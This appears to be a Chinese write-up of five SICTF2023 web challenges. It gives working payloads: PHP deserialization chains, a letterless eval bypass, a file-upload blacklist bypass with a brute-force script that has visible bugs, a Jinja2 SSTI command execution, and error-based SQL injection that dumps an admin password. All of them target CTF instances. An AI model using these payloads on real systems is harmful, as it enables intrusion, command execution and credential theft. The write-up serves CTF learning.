首页 > 其他分享 >SICTF2023 web_wp

SICTF2023 web_wp

时间:2023-01-19 22:55:11浏览次数:56  
标签:__ web GET function SICTF2023 echo username wp public

兔年大吉

源码如下

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    private $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }

}

class Rabbit{
    private $aspiration;
    public function __set($name,$val){
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
}else {
    echo "过新年啊~过个吉祥年~";
}
?>

挺基础的一个反序列化,先找pop链:

Year::destruct -> Year::firecrackers() -> Rabbit::set-> Year::get-> Nevv::invoke -> Happy::call 简单写一下代码:
<?php

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }
}

class Nevv{
    private $happiness;
    public function __construct($tmp)
    {
        $this->happiness = $tmp;
    }
}

class Rabbit{
    private $aspiration;
    public function __construct($tmp)
    {
        $this->aspiration = $tmp;
    }

}

class Year{
    public $key = "happy new year";
    public $rabbit;
}
$year = new Year;
$year2 = new Year;
$rabbit = new rabbit($year2);
$year->rabbit = $rabbit;
$happy = new Happy("system", "ls");
$nevv = new Nevv($happy);
$year2->rabbit = $nevv;
echo urlencode(serialize($year));
?>

直接打就行了

 ezbypass

源码如下:

<?php
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['code'])) {
    $code = $_POST['code'];
    if (strlen($code) <= 105){
        if (is_string($code)) {
            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
                eval($code);
            } else {
                echo "Hacked!";
            }
        } else {
            echo "You need to pass in a string";
        }
    } else {
            echo "long?";
    }
}

可以看到该过滤的都过滤了,而且payload长度限制了105,这样我们可以想到利用php的自增特性来构造攻击代码

code=$_=(_/_._);$_=$_[''!=''];$%ff=%2b%2b$_;$%ff=%2b%2b$_.$%ff;$_%2b%2b;$_%2b%2b;$%ff.=%2b%2b$_;$%ff.=%2b%2b$_;$_=_.$%ff;$$_[_]($$_[__]);&_=system&__=cat /f*

这里解释一下,(_/_) 的输出为NaN,再拼接一个_就可以名正言顺的成为一个字符串,然后我们就可以取"N"通过++来构造出POST

其实这段payload还可以更短,有兴趣的读者可以自行研究 ,最终我们得到的是$_POST[_]($_POST[__]),这样就可以命令执行了。

 

ezupload 源码如下:
<?php
    @error_reporting(0);
    date_default_timezone_set('America/Los_Angeles');
    highlight_file(__FILE__);
    if (isset($_POST['submit'])){
        $file_name = trim($_FILES['upload_file']['name']);
        $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);

        if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

            if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        }else {
            $msg = '你传啥玩意??';
        }
    }
    if($is_upload){
        echo '呀,(传)进去了欸~';
    }
?>

纸老虎,.php都没限制,就是date加随机数改了个文件名,我们可以在本地搭个一样的来得到文件名,然后往后爆破就能得到上传路径的文件了

这里注意手速一定要快,要不然要多爆破好久,检验代码如下:

import requests

url = 'http://095468b8-416d-4ea2-9f71-cb0cb7ab617e.ctf.qsnctf.com:8080/upload/'

for i in range('本地文件名', '比本地文件名大就行'):
    urls = url + str(i) + ".php"
    r = requests.get(url)
    if r.status_code == 404:
        continue
    else:
        print(q)

得到文件后,就是常规的getshell了。

 

SSTI

看页面源代码得到参数?SI,试了下{{1}},报违规字符了,说明{{是被限制了,我们利用{%print %}来绕过这个限制,这题很明显在考一系列的限制过滤

把关键的类都限制了,__class__之类的。我们这里利用jinjia2的特性['__clas''s__']来绕过这个限制,后面的我不想测试,所以都写成这个样子,payload如下:

?SI={%print config['__cla''ss__']['__in''it__']['__glo''bals__']['os']['po''pen']('cat /g*').read()%}

还是挺简单的

 

ezphp

开局一个登录界面,加个单引号,直接有报错,很明显报错注入,中途的测试过程我就省略了,直接上最后的payload:

admin'/**/and/**/updatexml(1,(concat(0x7e,(selselectect/**/group_concat(Password)/**/from/**/admin),0x7e)),1)#

账号密码admin:0909876qwe222

我们登录进去,随便输点东西,得到源代码:

<?php
ini_set('open_basedir',".");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
if($_COOKIE['admin']!=md5('adminyyds')){
    header('Location:/index.php');
    exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
    echo file_get_contents($_POST['url']);
    show_source(__FILE__);
}
else{
    echo('<form action="/admin.php" method="POST">
    url:<input value="" name="url" type="text">
    </form>
    ');
}
//x9sd.php
?>

可以读文件,下面还给了hint

url=file:///var/www/html/x9sd.php
class a {
    protected $cmd;
    function __destruct()
    {       echo $this->cmd;
        @eval($this->cmd);
        
    }
}

if(isset($_GET['username']) && isset($_GET['unserx'])){
    $var = base64_decode($_GET['unserx']);
           
    if($_GET['username'] === "admin"){
        echo "nonono?";
    }
    $username = urldecode($_GET['username']);
    if($username === "admin"){
        unserialize($var);
    }
    unserialize($var);
    echo("success");
}else{
    echo "I need some ???";
}

有是一个反序列化,这个直接就是a了,都不用找链:

<?php
class a {
    protected $cmd;
    function __construct($tmp)
    {
        $this->cmd = $tmp;
    }

}

if(isset($_GET['username']) && isset($_GET['unserx'])){
    $var = base64_decode($_GET['unserx']);
           
    if($_GET['username'] === "admin"){
        echo "nonono?";
    }
    $username = urldecode($_GET['username']);
    if($username === "admin"){
        unserialize($var);
    }
    unserialize($var);
    echo("success");
}else{
    echo "I need some ???";
}
$a = new a('eval($_POST[1]);');
echo base64_encode(serialize($a));
?>

 

 这样就getshell了

总结

web题不错,适合我这种新手做,这里抨击下ezmisc出题人,以后别这么出了。

 

标签:__,web,GET,function,SICTF2023,echo,username,wp,public
From: https://www.cnblogs.com/F12-home/p/17062259.html

相关文章

  • linux搭建webapp实战
    首先介绍下linux,linux因其开源,定制化高,安全等原因,成为了目前web应用部署首选的操作系统,linux操作系统有很多版本,常见的有centos,debian,RHLE,redhat,乌班图等等。今天我选了红......
  • JavaWeb-会话技术
    JavaWeb-会话技术1,会话跟踪技术的概述对于会话跟踪这四个词,我们需要拆开来进行解释,首先要理解什么是会话,然后再去理解什么是会话跟踪:会话:用户打开浏览器,访问web服务......
  • 基于WebSocket的实时消息传递设计
    目录概述整体架构设计流程设计程序设计WebSocketServer概述新增pom新增配置类创建websocket端点WebSocketClient概述安装WebSocketSharp初始化client创建连接接口设计新增......
  • JavaWeb-JSP
    JavaWeb-JSP1,JSP概述JSP(全称:JavaServerPages):Java服务端页面。是一种动态的网页技术,其中既可以定义HTML、JS、CSS等静态内容,还可以定义Java代码的动态内容,也就是JS......
  • win10下python3.9的代理报错问题解决(附web3的polygon爬虫源码)
    背景因为工作中经常需要代理访问,而开了代理,request就会报错SSLError,如下:requests.exceptions.SSLError:HTTPSConnectionPool(host='test-admin.xxx.cn',port=443):Ma......
  • Use Database.GetViewports
    布局自己本身就是一个视口。UseDatabase.GetViewports(true)依次返回的是,模型空间中的视口、布局一本身、布局一中的视口、布局二本身、布局二中的视口。UseDatabase.......
  • JavaWeb(二)
    6、Servlet6.1、Servlet简介Servlet是sun公司用于开发动态web的一门技术sun公司在这些API中提供的一个叫做Servlet的接口编写一个类,实现Servlet接口把开发好的java类部署到w......
  • Android WebView的用法
    WebView控件,借助它我们就可以在自己的应用程序里嵌入一个浏览器,从而非常轻松地展示各种各样的网页。修改activity_main.xml中的代码,如下所示:<LinearLayoutxmlns:andr......
  • Caddy-用Go写的新一代可扩展WebServer
    前几天用Netmaker的时候发现它用Caddy替换掉了Nginx,用了后发现确实简单好用,就安利一下。Caddy是一个强大的、可扩展的平台,用Go编写,可以为你的站点、服务和应用程......
  • Spring-webflux 响应式编程
    热爱可抵漫长岁月文章目录​​1.前言​​​​2.Spring-webflux简介​​​​3.什么是“响应式”​​​​4.Spring-webflux的响应式API​​​​5.SpringMVC还是WebFlu......